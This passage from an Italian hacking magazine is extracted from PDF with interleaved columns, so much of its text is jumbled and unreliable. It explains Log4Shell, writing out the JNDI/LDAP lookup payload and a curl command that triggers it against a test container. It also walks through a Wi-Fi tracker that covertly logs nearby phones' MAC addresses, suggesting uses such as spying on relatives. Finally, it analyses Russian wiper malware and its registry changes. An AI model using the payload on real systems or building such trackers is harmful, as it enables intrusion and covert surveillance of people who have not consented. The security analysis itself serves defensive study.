Il bug Log4 ina su cui è presente
scrivendo va inteso
nt ro ll o di un a m ac ch
il co
un applicativo Java
in senso letterale e non
come un simbolo

N
speciale. Per esempio,
di solito \n indica un
ell’arco degli ultimi anni (DON’T) LOOKUP
invio a capo: se si
desidera che venga abbiamo assistito a una serie L’errore di fondo è in realtà molto
interpretato in senso di bug “famosi”, che hanno comune: la mancata validazione
letterale, bisogna avuto un certo risalto anche dell’input dell’utente. Il problema, in
scrivere \\n, usando sulla stampa generalista e ai quali è stato questo caso, è dato da una caratteristica
quindi il simbolo assegnato un nome. Qualcuno ancora di Log4J: i lookup. Essi sono un
\ come carattere
si ricorda di Heartbleed o di Shellshock, meccanismo usato per sostituire parti di
di escape.
che hanno causato molta preoccupazione testo dentro le stringhe da loggare, e
VARIABILI all’epoca della loro scoperta. Ma sono funzionano con il simbolo dollaro e le
D’AMBIENTE tutto sommato vulnerabilità facili da parentesi graffe. Per esempio, la stringa:
Le variabili d’ambiente contenere e correggere, ancora presenti
sono delle variabili
su alcuni sistemi non aggiornabili ma ${java:os}
gestite a livello
che difficilmente potrebbero essere
di sistema operativo,
tipicamente dalla shell, sfruttati da qualche malintenzionato viene sostituita con le informazioni sul
che possono cambiare grazie a una ridotta diffusione e a sistema operativo. Se come riga di log
a seconda del contesto strumenti di protezione come i firewall. scrivessimo:
in cui ci si trova Un bug di cui invece tutti ci ricorderemo
e sono accessibili
a lungo è Log4Shell, a causa della sua Host: ${java:os}; Tutto bene
dall’applicazione.
Vengono utilizzate diffusione e persistenza. In effetti, il
proprio per permettere software vulnerabile (Log4J) è un tool nel log otterremmo il testo:
all’applicazione gestito dalla Apache Foundation che è
di capire “dove” si molto diffuso: già soltanto i progetti della Host: Windows 10 10.0,
trova e quindi adattarsi stessa fondazione sono in buona parte architecture: amd64-64; Tutto bene
di conseguenza
basati su Java e su questa libreria.
(per esempio, capire
se stia girando su Inoltre, le vulnerabilità scoperte sono Chiaramente, questo è stato fatto
Windows o UNIX). diverse, tanto che riuscire a correggerle per comodità: è utile avere nei log
tutte ha richiesto più tempo del previsto. informazioni sull’ambiente, per capire

 18

figura #1
subito come replicare la situazione
che ha dato origine all’errore, e
questo meccanismo permette di
ottenere l’informazione senza
doverci pensare troppo. Per
questo motivo si può fare accesso
anche alle variabili d’ambiente:
${env:USERNAME}
In effetti anche queste potrebbero
essere informazioni sensibili, si sa
che a volte vengono memorizzate
delle password tra le variabili
d’ambiente. Un malintenzionato
potrebbe inviare all’applicazione
(per esempio delle API Web) una
stringa da loggare come:
User-Agent ${env:TEMPORARY_
SESSION_TOKEN}
Così Log4J scriverebbe il token
segreto sul disco, e in futuro
sarebbe possibile leggere il file
per recuperarlo. Però non è un
problema così grave: in genere
i log rimangono sulla macchina,
quindi le informazioni non
dovrebbero trapelare facilmente,
non è semplice recuperare il file di
log. Il vero problema è un altro:
Java Naming and Directory
Interface, anche abbreviato JNDI.
È il meccanismo standard di Java
per scrivere degli URL con cui
VULNERABILITÀ
Una delle tante app
vulnerabili è Minecraft.
Siccome Log4J non verifica
il contenuto delle stringhe loggate,
finirebbe per inseguire il lookup
e andare a scaricare il file “exploit”.
Ma non finisce qui: se il file in
questione contiene codice Java
valido, questo verrà eseguito
automaticamente. Si ottiene,
quindi, una ovvia esecuzione
raggiungere oggetti e file remoti. remota di codice semplicemente
Se un malintenzionato possiede fornendo del testo a
un server LDAP in cui pubblicare un’applicazione, tra l’altro con una
un payload, può raggiungerlo così: stringa estremamente semplice.
ldap://127.0.0.1:8080/exploit ENTITÀ DELLA VULNERABILITÀ
Per capire la pericolosità di questo
La vulnerabilità nasce dal fatto che bug bisogna considerare un
i percorsi JNDI possono essere dettaglio: non tutte le applicazioni
inseguiti da un lookup e un Java basate su Log4J sono
malintenzionato potrebbe scrivere automaticamente vulnerabili, solo
un testo di questo tipo: quelle che loggano direttamente
${jndi:ldap://127.0.0.1:8080/ input dell’utente senza
exploit}. preoccuparsi di sanificarlo con le
Applicazione cavia
Si può testare una semplice applicazione vulnerabile d’esempio tramite
un’immagine docker appositamente realizzata:
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-
vulnerable-app
Questa applicazione logga tramite Log4J tutte le intestazioni delle richieste
HTTP che le arrivano, quindi si può provare in questo modo:
curl 127.0.0.1:8080 -H ‘X-Api-Version:
${jndi:ldap://127.0.0.1/a}’
Appena la riga viene loggata, la Virtual Machine Java cercherà di caricare
il codice presente nel server LDAP su localhost (che per fortuna non esiste).
Controllando l’output dell’applicazione si noterà l’errore:
Connection refused
perché ovviamente non c’è un server LDAP in ascolto. Se si sostituisse
quel percorso con uno realmente esistente, il codice Java caricato
sul server LDAP verrebbe eseguito.
19 
 HACKTUALITÀ
GLOSSARIO
corrette sequenze di escape per i simboli ovviamente, che quelle persone siano
speciali. Possiamo quindi dire che il vero sufficientemente esperte da non lasciar
DI BASE
problema di fondo sta nel fidarsi troppo infettare il proprio PC da qualche
LDAP delle librerie esistenti, senza prendere malware che potrebbe scansionare la
Si tratta di un precauzioni. A ogni modo, considerando rete alla ricerca di server vulnerabili. Del
protocollo per l’effettivo numero di applicazioni resto fare una scansione di questo tipo
l’accesso a directory vulnerabili, è chiaro che in tanti si siano su macchine pubbliche è estremamente
remote: permette
fidati di Log4J. Un grosso problema facile per un malintenzionato: basta
di condividere
credenziali, rubriche, è rappresentato dai vari progetti della connettersi a un server e inviare questa
o anche file. fondazione Apache, che ormai da anni stringa, se il target è predisposto per
Approssimando, colleziona progetti basati su Java, i quali loggare le varie richieste che arrivano
è sostanzialmente sono estremamente diffusi su desktop l’attacco avrà automaticamente
un database leggero, e server di tutto il mondo. In linea di successo. E se l’attacco ha successo, il
quindi è possibile
massima si possono poi considerare criminale può fare tutto ciò che vuole,
usarlo per fornire
in modo sicuro relativamente sicuri software che non perché può facilmente ottenere un
qualsiasi tipo sono aperti al pubblico, ma magari terminale remoto ed entrare nella
di dato possa risultano disponibili a un numero macchina con i privilegi dell’utente che
essere strutturato. ristretto di persone (per esempio eseguiva l’applicazione Java (che spesso
solo in una rete locale). A condizione, ma non sempre, per fortuna, è root).

figura #2

Appena l’app
segue
il lookup
malevolo, il
pirata ottiene
una reverse
shell sul
sistema
vittima.

La soluzione
Correggere il bug è un’operazione piuttosto
complessa: sono state apportate delle modifiche alle
versioni vulnerabili di Log4J (fino alla 2.16), rilasciando
la 2.17. Ma, proprio mentre scriviamo, si è scoperto
che anche nella nuova 2.17 è presente una
vulnerabilità, e si attende a breve il rilascio di
un’ulteriore patch, sperando che sia definitiva. A quel
punto, gli sviluppatori di tutte le app che dipendono
da Log4J dovranno aggiornare le proprie dipendenze
e rilasciare una nuova versione dell’applicazione.
E poi chi amministra i sistemi dovrà installare le nuove
versioni sui propri server e desktop. Una strada
potenzialmente percorribile da subito può essere il
rollback alla versione 1 di Log4J, che non è vulnerabile,
ma questo potrebbe comportare modifiche più
impegnative sulle app e non è detto che si risparmi
davvero del tempo. Oltretutto, c’è l’ovvio problema
che alcune applicazioni, semplicemente, non potranno
essere aggiornate: applicazioni ormai non più
mantenute, oppure installate in sistemi complessi che
non possono facilmente essere aggiornati. Pensiamo
a software medicali, spesso progettati per sistemi
operativi molto vecchi e mai aggiornati perché le loro
licenze costano troppo per le tasche degli utilizzatori.
Questa vulnerabilità è qualcosa con cui dovremo,
probabilmente, fare i conti per molto tempo.

 20
SICUREZZA
Sorveglianza Wi-Fi Monitorati e schedati
Seconda parte del progetto di creazione di un tracciatore per smartphone ............... 22

wiper Nuovi malware da cyberguerra

Analisi dettagliata dei tool distruttivi usati dalla Russia per attaccare l’Ucraina......... 26

2fa La doppia autenticazione e bacata

Un attacco che sta colpendo molti utenti in Rete e che causa danni gravi.................. 34

pentesting Attacco a dizionario!

Progettiamo un dictionary attack calibrato su una Web application reale!.................. 36
 SICUREZZA

MON I T O R AT I
E SCH E D A T I ! Seconda parte

o il p ro g e tt o ch e ci porterà ad avere
Terminiam p ersonalizzabile
re d i sm a rt p h o n e
un tracciato d ic e sc ri tt o in C e in BASH
o’ d i co
usando un SoC e un p

N
ello scorso numero LO SCRIPT BASE la parte di scansione
abbiamo iniziato Ripartiamo dallo script presente modificando il file /etc/rc.local:
un progetto che, all’URL https://pastebin. agendo da root, apritelo con il
sfruttando il Wi-Fi, com/0B7Gpjnt. In fondo a questo vostro editor di testi preferito
ha lo scopo di individuare codice ci sono degli script, come e aggiungete prima della scritta
la posizione dei cellulari dei sposta_e_controlla_dati.sh exit 0 il comando
clienti all’interno di un negozio. e altri quattro, che si occupano
In queste pagine concludiamo di formattare i dati; li potete ./scansiona.sh wlan0 120 &
tale progetto. Se vi siete persi scaricare da qui: https://bit.
la prima parte, potete acquistare ly/3JSMwAZ. A ogni modo, anche In questo modo il comando
l’arretrato del numero 261 senza di essi lo script Bash andrà in esecuzione a ogni
di HJ dall’URL https://sprea.it/ è in grado di collezionare i dati, riavvio, automatizzando le
riviste/139, in formato cartaceo per cui potrete elaborarli come operazioni. Leggendo il file Bash,
oppure in digitale. meglio vi aggrada. Concludiamo vi accorgerete che i dati vengono
salvati in RAM e poi spostati
Anche i moderni display pubblicitari sulla microSD una volta ogni ora.
Questa scelta è frutto di un
sono in grado di tracciare gli compromesso: da una parte,
smartphone, oltre che acquisire il desiderio di non “bruciare” la
microSD con eccessive scritture
alcuni dati biometrici come età (una ogni due minuti, cioè 30
e sesso di chi passa loro davanti all’ora) e dall’altra la giusta

 22

necessità di preservare in dati
in caso di uno spegnimento non
pianificato della scheda ARM.
Lo svantaggio è che, in caso di
spegnimento non programmato,
potreste perdere fino a 29
registrazioni, un danno
considerato tutto sommato
accettabile in fase di
pianificazione delle specifiche
di progetto. Dato che potrete
accedere ai sorgenti, sarà un
gioco da ragazzi individuare
e modificare il parametro “59”
(che indica il tempo in minuti che
deve trascorrere tra un backup
su microSD e il successivo),
alzandolo o abbassandolo a
seconda delle vostre necessità.
Scaricate i sorgenti dai link
indicati prima e spostateli nella
directory /root che sarà la vostra
directory di lavoro: i vari file
nome.c andranno compilati con
gcc nome.c -o nome
in quanto verranno eseguiti
all’interno degli script Bash che
saranno a loro volta richiamati
dallo script scansiona.sh che
abbiamo visto nella puntata
precedente. Abbiate l’accortezza
di rendere eseguibili i file Bash
con il comando
chmod +x *.sh
STRUTTURA MODULARE
Bene, abbiamo raccolto i dati,
ma ora la domanda è: “cosa ce
ne facciamo?”. Risposta: “quello
che più ci aggrada!”. Nel nostro
caso, abbiamo deciso di limitarci
a registrare, nella singola
giornata, per quanto tempo le
periferiche “bersaglio” si trovano
nel raggio d’azione del nostro
SORVEGLIANZA WI-FI
registratore, segnandoci inoltre
ora e minuti di quando sono
state rilevate la prima e l’ultima
volta nell’arco della giornata.
A cosa serve un sistema del
genere? Per esempio, potrebbe
essere usato per controllare
se e per quanto tempo nostra
suocera è rimasta a casa nostra
mentre noi eravamo via, o per
monitorare quanto tempo nostro
figlio è stato attaccato a YouTube
durante le ore dedicate allo
studio… Insomma, lo strumento
c’è, sta alla fantasia di ognuno
immaginare come meglio
utilizzarlo. Nei file scaricabili
osserverete che ci sono tre script
Bash che lanciano a loro volta tre
eseguibili e, successivamente, un
eseguibile finale di “conclusione”.
Anche se a una prima occhiata
potrebbe apparire un metodo
confusionario e complesso,
questo sistema ci permette
di isolare i quattro passi logici:
• generazione degli indici
di lavoro;
• generazione dei dati
mensili globali;
I dati rilevati su base giornaliera: i link permettono
di accedere ai dati dei mesi precedenti, qualora presenti.
• generazione dei dati annuali
singoli per ogni periferica
monitorata;
• generazione dei dati mensili
accorpati su base annua.
Questo metodo apparentemente
“frammentato” è in realtà
il migliore ed è alla base
della filosofia che ha fatto
grandi i sistemi UNIX, cioè
la metodologia KISS (Keep it
simple, stupid!). In altre parole,
spezzare un’attività complessa
in sotto attività più semplici: ogni
programma deve fare una cosa
sola e nel migliore dei modi.
I vantaggi principali sono che:
• due programmi “corti” sono
manutenibili e ottimizzabili
con maggior facilità rispetto
a un unico programma “lungo”
che racchiude quelle due
funzioni svolte dai due
programmi “corti”;
• la modularità del software
facilita l’aggiunta di nuove
funzioni scrivendo un
programmino in più
e senza andare a disturbare
i programmi già fatti.
figura #1
23 
 SICUREZZA
figura #2
I link ipertestuali della
pagina mensile
permettono di accedere
ai dati aggregati su base
annua della singola
periferica intercettata.
DA BASH A C
Per quanto ci riguarda, abbiamo
proceduto scrivendo la prima
versione del software in Bash,
per una veloce realizzazione
e verifica. Poi, una volta che
la funzione svolta è risultata
corretta, abbiamo tradotto
il software in C per ottimizzare
le prestazioni, dato che abbiamo
riscontrato che i tempi
di elaborazione crescevano
esponenzialmente al crescere
dei dati da elaborare. Per
stressare il software abbiamo
 24
generato volutamente
un’eccessiva massa di dati
da elaborare e le due versioni
– Bash e C – necessitavano
rispettivamente di 143 minuti
e di 12 secondi per completare
l’elaborazione. Siccome la
velocità di generazione dei dati
finali era un imperativo, pena
l’inutilità della visualizzazione
dinamica dei dati, il passaggio
al C si è dimostrato obbligato.
Nei sorgenti C abbiamo
comunque mantenuto alcune
istruzioni Bash perché abbiamo
riscontrato che rifarle
direttamente in C non apportava
benefici in termini di velocità
a fronte di un’inutile
complicazione del codice.
I programmi che generano
i risultati visibili provvedono
a realizzarne due versioni: in
formato txt e in formato HTML.
In questo modo è garantita la
flessibilità di fruizione: potrete
sia acquisire i dati come testo in
un foglio elettronico, sia vederli
direttamente tramite una pagina
Web, per un’immediata
comprensione della situazione.
Inoltre le pagine sono collegate
le une alle altre tramite link
ipertestuali, in modo che
l’utente possa scorrere
all’interno dei vari blocchi
di informazione. La scelta
dell’HTML puro può sembrare
desueta e rimanda con la
memoria all’era del “Web 1.0”,
ma ancora una volta ricordiamo
la filosofia KISS: delle pagine
HTML statiche sono la cosa più
veloce da erogare da parte di un
server Web e, inoltre, l’assenza
di database facilita la
manutenzione del server per
il semplice fatto che “quello che
non c’è, non si può rompere”.
Per recuperare i file HTML
necessari (con le istruzioni),
visitate https://bit.ly/3DqxHTW.
LA GESTIONE WEB
I file che avete scaricato
si occupano di rendere fruibili
i dati via Web: questi file
andranno spostati nella
directory /var/www/html.
I dati sono generati e posizionati
in RAM per non usurare la
microSD, ragion per cui occorre
creare il link simbolico tramite
i comandi:
cd /var/www/html
ln -s /dev/shm dati
Come impostato nella puntata
precedente, l’apparato ha
indirizzo di rete 192.168.1.210,
per cui dal client puntate
il vostro browser a tale indirizzo
e vi troverete di fronte a uno
scarno ma essenziale menu.
La voce “aiuto” vi fornirà delle
sommarie istruzioni, la voce
“scarica dati” vi permetterà
di recuperare un file Zip
contenente tutti i dati registrati.
Infine, la voce centrale “mensile”
vi permetterà di accedere ai dati
consultabili a video. Se avrete
registrato più di un mese,
il sistema vi proporrà
automaticamente dei link per
scorrere avanti e indietro lungo
i mesi. Inoltre ogni MAC Address
è a sua volta un link ipertestuale
che vi permetterà di accedere
al dettaglio, raggruppato su
base annuale, del singolo nodo
registrato. I dati scaricati
contengono sia la versione
HTML che quella TXT, per cui
non avrete problemi a elaborarli

IL GRANDE FRATELLO È REALTÀ
Il film 1984 rappresenta una realtà distopica nella
quale ogni cittadino viene spiato dal proprio governo
dittatoriale… Beh, benvenuti nel terzo millennio!
La Cina usa massivamente telecamere per tracciare
i propri cittadini che vengono riconosciuti tramite
identificazione facciale grazie ad algoritmi che
assegnano a ogni persona un ‘punteggio sociale’
in base a come egli si comporta. Scendendo nella
graduatoria, man mano la persona viene privata di
diritti come prendere mezzi pubblici, avere la patente,
SORVEGLIANZA WI-FI
ecc. Qui trovate i dati: https://en.wikipedia.org/wiki/
Mass_surveillance_in_China. Ma nel “democratico”
Occidente? Beh, anche peggio. Gli Stati Uniti hanno
cominciato, fin dal 1955, non solo a ficcanasare negli
affari dei propri cittadini, ma anche in quelli del resto
del mondo grazie al programma Echelon.
https://en.wikipedia.org/wiki/Mass_surveillance_in_
the_United_States
https://en.wikipedia.org/wiki/ECHELON

tramite programmi C/Bash portati al sito https://dnschecker. identificare il modello, oltre che
o a importarli nel vostro foglio org: inserendo l’indirizzo MAC la marca! Ci preme far presente
elettronico preferito per del nostro cellulare siamo riusciti che non stiamo violando
ulteriori elaborazioni. a ricavare interessanti dettagli. nessuna norma: questi database
In poche parole, i primi 3 byte, sono su Internet, liberamente
COME ESPANDERE nel nostro caso 20:64:32, accessibili e scaricabili in formato
IL SOFTWARE lo identificano immancabilmente testo. Una volta acquisiti,
Con poco sforzo potete quindi come un Samsung. E siccome le potreste modificare il software
raccogliere molti dati grezzi; ultime tre cifre sono un numero per aggiungere un campo
il modo in cui “macinarli” per progressivo che va da 00:00:00 indicante marca e modello
ricavarne le informazioni che vi a FF:FF:FF, più è piccolo tale del cellulare “sniffato”… ma non
interessano è solo una questione numero e più vecchio risulta vogliamo farvi penare troppo
di scelta. Invitiamo alla lettura essere il cellulare: con un po’ di e vi passiamo direttamente il link
della pagina man dei vari pratica e incrociando abbastanza http://standards-oui.ieee.org/
programmi della suite aircrack- dati, si può addirittura oui/oui.txt.
ng (airodump-ng in particolare)
perché il vostro cellulare è un
chiacchierone e airodump-ng è
pronto a registrare ogni dettaglio
figura #3
che, seppur apparentemente
insignificante, potrebbe dire
molto a un agguerrito
“curiosone” dell’etere.
Per esempio, sapete che i MAC
Address sono rilasciati “a blocchi”
da un ente preposto a tutte le
industrie che ne fanno richiesta?
Per saperne di più della logica
alla base dei MAC Address,
consultate la pagina https://it.
wikipedia.org/wiki/Indirizzo_
MAC. Una rapida ricerca per Niente di più facile: un click su “Scarica dati” e recuperiamo
“mac address lookup” ci ha il file compresso contenente tutti i dati accumulati!

25 
 SICUREZZA

NUOVI MALWARE
da cyberguerra
Analisi dettagliata dei tool distruttivi utilizzati dalla Russia
per attaccare l’Ucraina e comprometterne le infrastrutture

L
a guerra della Russia
contro l’Ucraina passerà
tristemente alla storia
anche per l’utilizzo
di modalità di cyberwarfare
che hanno visto l’impiego di
malware distruttivi prima ancora
della fase di invasione vera e
propria avvenuta il 24 febbraio
2022 e che sono poi continuati
(con diverse varianti) durante le
successive settimane di assedio.
Al momento in cui scriviamo
sono quattro i malware
principalmente utilizzati I primi due sono stati diffusi nei
dalla Russia per distruggere mesi precedenti all’invasione,
le infrastrutture ucraine: gli altri due a guerra cinetica
WhisperGate, già in corso. In queste pagine
FoxBlade/SonicVote, cercheremo di ricostruire quello
Laisanraw e CaddyWiper. che è successo in questi mesi.
Il centro protezione Microsoft (MSTIC)
ha scoperto a Gennaio il malware
WhisperGate per Windows.
Per dettagli visitate il sito
bit.ly/malwaretargetingukrainian

 26

WHISPERGATE: UN MESE
PRIMA DELL’INVASIONE
WhisperGate è un
malware wiper
per Windows
che agisce
generalmente
in due fasi. Nella
prima fase un bootloader, spesso
nominato stage1.exe (che risiede
in varie directory, tra le quali
C:\PerfLogs, C:\ProgramData,
C:\ e C:\temp), sovrascrive il
Master Boot Record (MBR) del
sistema vittima con una falsa
richiesta di riscatto [figura #1].
Il riscatto è soltanto un diversivo
(il suo pagamento non aiuta
infatti a recuperare i dati persi)
e lo spegnimento del sistema
infetto distrugge definitivamente
l’host eseguendo il malware che
danneggia i file in esso archiviati.
Nella seconda fase un
downloader (denominato stage2.
exe) scarica il malware dannoso
da un canale Discord, tramite
un link codificato nel downloader
stesso, e lo esegue in memoria.
I FILE PRESI DI MIRA
Il wiper corrompe così tutti i file
che hanno determinate estensioni
(immagini, archivi compressi,
La falsa richiesta di riscatto di WhisperGate.
Fonte: CrowdStrike
documenti, database ecc.), e che
sono memorizzati in specifiche
directory, sovrascrivendoli con
byte 0xCC (per una dimensione
totale del file di 1 MB) [figura #2].
Danneggiati i file, il malware
li rinomina con un’estensione di
4 byte apparentemente casuale.
Una delle sue particolarità è che il
bootloader accede al disco tramite
BIOS interrupt 13H in modalità
LBA e sovrascrive ogni 199esimo
settore fino al raggiungimento
della fine del disco. Danneggiato
il disco, il malware passa a
sovrascrivere il disco successivo
presente nell’elenco delle unità
rilevate. È bene precisare che
l’analisi di questo malware è
ancora in corso e al momento in
cui scriviamo non sono disponibili
tool di decrittaggio/recupero dati.
SONICVOTE E FOXBLADE:
POCHI GIORNI PRIMA
DELL’ATTACCO
Per gli esperti,
SonicVote (alias
HermeticRansom)
è un ransomware
scritto in Go
(versione 1.10.1)
utilizzato per distogliere
l’attenzione dall’attacco di
figura #1
Elenco delle estensioni dei file danneggiate da wiper di
WIPER
HermeticWiper, a causa del suo
stile non sofisticato e della scarsa
implementazione, e come payload
aggiuntivo per aumentare
l’efficacia di quest’ultimo.
Dall’analisi di HermeticRansom
risulta infatti che non è stato
usato alcun tipo di offuscamento
e che le sue semplici
funzionalità, nonché il metodo
di cifratura particolarmente
inefficace, suggeriscano sia stato
creato in un breve lasso di
tempo. Dopo l’esecuzione,
HermeticRansom crea un ID che
viene utilizzato come chiave.
Quindi identifica i dischi presenti
sul sistema infetto e raccoglie
un elenco di directory e file,
escluse le cartelle Windows
e Programmi. Successivamente
crea il file read_me.html nella
cartella Desktop dell’utente,
che contiene l’ID della vittima
e gli indirizzi di posta elettronica
sul dominio ProtonMail
per contattare l’aggressore.
L’inefficacia del flusso di lavoro
della crittografia di questo
malware consiste nel fatto che
per ogni file crittografato crea
delle copie del sample iniziale
e le esegue come processi
separati [figura#3].
figura #2
WhisperGate. Fonte: Microsoft
27 
 SICUREZZA
figura #3 FOXBLADE: IL MALWARE
CHE DISTRUGGE L’MBR
FoxBlade (alias HermeticWiper)
è invece un malware che
distrugge il Master Boot Record
(MBR) e cancella i dati archiviati
nei dischi del sistema vittima.
Uno dei tanti nomi che sono
stati attribuiti a questo wiper
deriva dal fatto che il suo
L’inefficacia di HermeticRansom consiste nel fatto che ogni volta
eseguibile è stato firmato
che cripta un file crea una sua copia nella directory corrente.
Fonte Kaspersky: https:// securelist.com/ utilizzando un certificato digitale
elections-goransom-and-hermeticwiper-attack/105960/ valido rilasciato a “Hermetica
Digital Ltd”, una piccola azienda
videoludica di Cipro ignara,
ALGORITMO DI e probabilmente da un hacker però, del furto d’identità [figura
CRITTOGRAFIA UTILIZZATO non esperto in GoLang), ogni #5]. Il periodo di inattività di
I file vengono crittografati volta che il binario e i suoi questo malware (dall’infezione
utilizzando l’algoritmo AES cloni vengono eseguiti, viene all’esecuzione del payload)
in modalità Galois/Counter generata sempre la stessa può essere configurato da riga
(GCM). La chiave AES a 32 byte, chiave AES. Tutti i file di comando tramite due
generata tramite una funzione crittografati sull’host usano parametri facoltativi. Se nulla
del pacchetto Go, viene poi quindi la medesima chiave di viene specificato, le impostazioni
crittografata con RSA-OAEP cifratura e la sua conoscenza di default sono di 20 minuti
(https://bit.ly/hj_OAEP) consente pertanto di decrittare per dare inizio alla distruzione
utilizzando una chiave pubblica i file. In merito alle soluzioni del sistema e di 35 minuti per
RSA che è hardcoded come disponibili per la decrittografia il riavvio dell’host. Una volta
blob base64 (quindi facilmente dei dati compromessi da eseguito, utilizzando le API di
decrittabile). A ogni file HermeticRansom rimandiamo Windows il malware si concede
crittografato, HermeticRansom allo specifico box i privilegi necessari per
aggiunge l'estensione di approfondimento. compiere le sue azioni agendo
.encryptedJB e l’indirizzo email
[vote2024forjb@protonmail[.]
com] subito dopo il nome
originale del file. Considerato
figura #4
La nota creata da
l'alto contenuto politico
HermeticRansom contiene
rilevato nel codice del malware costrutti grammaticali che
(strutture e metodi fanno suggeriscono sia stata scritta da
riferimento alle elezioni chi non ha un inglese fluente o
presidenziali statunitensi), che possa non essere stata
si presume che la sigla "JB" revisionata per mancanza di
tempo. Da notare i riferimenti alle
stia a indicare il presidente
elezioni americane, di cui l’intero
USA, Joseph Biden. binario è pieno zeppo. Fonte
A causa di un ulteriore errore CrowdStrike: https://www.
di implementazione (che crowdstrike.com/blog/
conferma l’ipotesi che how-to-decrypt-the-partyticket-
il malware sia stato scritto ransomware-targeting-ukraine/
in breve tempo [figura #4]

 28

su SeShutdownPrivilege (che
fornisce la possibilità di
arrestare un sistema locale),
SeBackupPrivilege (che offre
il controllo dell'accesso
in lettura a qualsiasi file)
e SeLoadDriverPrivilege (che
dà la possibilità di caricare e
scaricare un driver di periferica).
UN SAMPLE
DI HERMETICWIPER
Ha tipicamente una dimensione
di 114 KB, di cui circa il 70%
è composto da risorse. Tra
le risorse binarie del malware
sono infatti presenti dei driver
di gestione delle partizioni
a 32 e 64 bit, compressi con
l'algoritmo Lempel-Ziv e firmati
da un certificato legittimo
rilasciato alla software house
EaseUS. Si tratta quindi di un
abuso del driver legittimo
empntdrv.sys (EaseUS Partition
Master NT Driver), che fa parte
del software EaseUs Partition
Master [figura #6]. In base alla
versione di Windows infettata,
il malware estrae il driver
corrispondente e lo scrive nella
cartella C:\Windows\System32\
drivers rinominandolo con un
nome composto da 4 caratteri
generato in modo pseudo-
casuale utilizzando l’ID processo
del wiper. Questo file viene poi
decompresso con LZCopy
in un nuovo file con estensione
.sys (per esempio bpdr.sys).
Prima di caricare il driver, però,
il malware disabilita il dump
di arresto anomalo di Windows
modificando la chiave di registro
HKLM\SYSTEM\
CurrentControlSet\Control\
CrashControl\
CrashDumpEnabled
figura #5
La firma digitale di HermeticWiper.
Fonte IBM: https://
securityintelligence.com/posts/
new-destructive-malware-cyber-
attacks-ukraine
sul valore 0. Per caricare il
driver, il malware crea un nuovo
servizio utilizzando le API e lo
richiama in un ciclo di cinque
volte consecutive per garantirne
il caricamento. Fatto ciò,
il servizio viene rimosso
eliminando l'intera chiave
del registro di sistema.
Caricato il driver, il malware
disabilita il servizio di Copia
Shadow del Volume (VSS)
di Windows per impedire
l’uso delle copie di backup
necessarie al ripristino del
sistema. Successivamente crea
Le risorse di HermeticWiper contengono i driver a 32 e 64 bit
di EaseUS Partition Manager per Windows XP e per Windows 7
e superiori. Fonte SentinelLabs: https://www.sentinelone.com/labs/
hermetic-wiper-ukraine-under-attack/
WIPER
una serie di thread aggiuntivi che
si occupano di gestire il riavvio
del sistema e di nascondere le
tracce del malware disabilitando
le funzionalità dell’interfaccia
che potrebbero allertare l’utente
sulla presenza di attività sospette
(per disabilitare i colori per i file
NTFS compressi e crittografati
imposta la chiave di registro
HKU\Software\Microsoft\
Windows\CurrentVersion\
Explorer\Advanced\
ShowCompColor sul valore 0,
mentre per disabilitare le
informazioni pop-up su cartelle
ed elementi del desktop imposta
a 0 la chiave HKU\Software\
Microsoft\Windows\
CurrentVersion\Explorer\
Advanced\ShowInfoTip). Infine,
il malware inizia la sua routine
distruttiva su ciascun disco fisico
rilevato sovrascrivendo i file,
distruggendo le tabelle delle
partizioni e corrompendo i primi
512 byte, ossia il Master Boot
Record (MBR).
HERMETICWIPER
DISTINGUE FAT O NTFS
Nel caso di una partizione FAT,
il malware chiama direttamente
le API di Windows necessarie ad
acquisire un provider di servizi
di crittografia (CSP) usato poi
figura #6
29 
 SICUREZZA
COME RECUPERAR E I FILE IN CASO
ICRANSOM In alcuni scenari è emerso
DI ATTACCO HERMET che, oltre al diversivo creato da
HermeticRansom per coprire
Gli errori di implementazione di HermeticRansom nella generazione della le azioni del malware distruttivo
chiave AES, già discussi nel corso di questo articolo, rendono possibile HermeticWiper,
il recupero dei dati crittografati da questo ransomware. Ciò ha permesso
gli attacchi hanno sfruttato
ad alcune società di sicurezza di rilasciare dei tool di decrittazione.
CrowdStrike, ad esempio, ha caricato su GitHub (https://bit.ly/ anche un worm (ribattezzato
partyticketdecriptor) uno script in Go (testato con la versione 1.16.6 di HermeticWizard) utilizzato
Go) per decrittografare i file compromessi da HermeticRansom (che la per la propagazione
società ha ribattezzato “PartyTicket”). Può essere compilato come del malware sulla rete
eseguibile o eseguito da una shell aperta nella directory dello script con locale compromessa.
il comando go run PartyDecrypt.go. Per decrittografare un file occorre
passarlo come argomento tramite il flag -p e l’output decrittografato verrà
poi salvato nella stessa directory come decrypted.bin. Il suo vantaggio, LASAINRAW: IL MALWARE
essendo scritto in Go, è che può essere eseguito su GNU/Linux, Windows DELL’ATTACCO
e Mac (https://bit.ly/goperwindows). Più user friendly è, invece, Lasainraw (alias
l’approccio usato da Avast, che ha rilasciato un tool di decrittografia IsaacWiper) è un
basato su una comoda procedura guidata, specifico per Windows
attacco malware
(https://bit.ly/decryptorhermeticransom). Il primo step chiede
di selezionare i file e le posizioni da scansionare (siano esse unità
distruttivo
di rete o singole cartelle); le unità locali vengono invece rilevate apparso nella
automaticamente e aggiunte all’elenco. Il tool crea di default una copia telemetria
di backup dei file crittografati prima di tentarne il recupero (che non può di ESET (https://www.
essere garantito al 100%), così da evitare la perdita dei dati. welivesecurity.com/2022/03/01/
Opzione, questa, che può essere deselezionata (se si è già provveduto
isaacwiper-hermeticwizard-
a un backup) per velocizzare l’operazione. Si ricorda che è bene eseguire
il tool con i privilegi di amministratore per consentire al motore wiper-worm-targeting-ukraine/)
di scansione di trovare tutti i file crittografati nel PC. e sul quale il Microsoft Security
Response Center (MSRC) sta
Il decryptor per continuando a indagare.
Il 25 febbraio è stata osservata
HermeticRansom
anche una nuova versione
rilasciato da Avast
di IsaacWiper che include
rende la procedura
i registri di debug. Ciò starebbe
di recupero dati
a indicare che gli aggressori
su Windows non sono stati in grado di
estremamente facile. cancellare alcuni dei sistemi
presi di mira e hanno quindi
deciso di registrare dei log
(memorizzati nel file
C:\ProgramData\log.txt) per
cercare di capire in quali punti
per generare i byte casuali che logica nelle directory, la loro la procedura di attacco falliva.
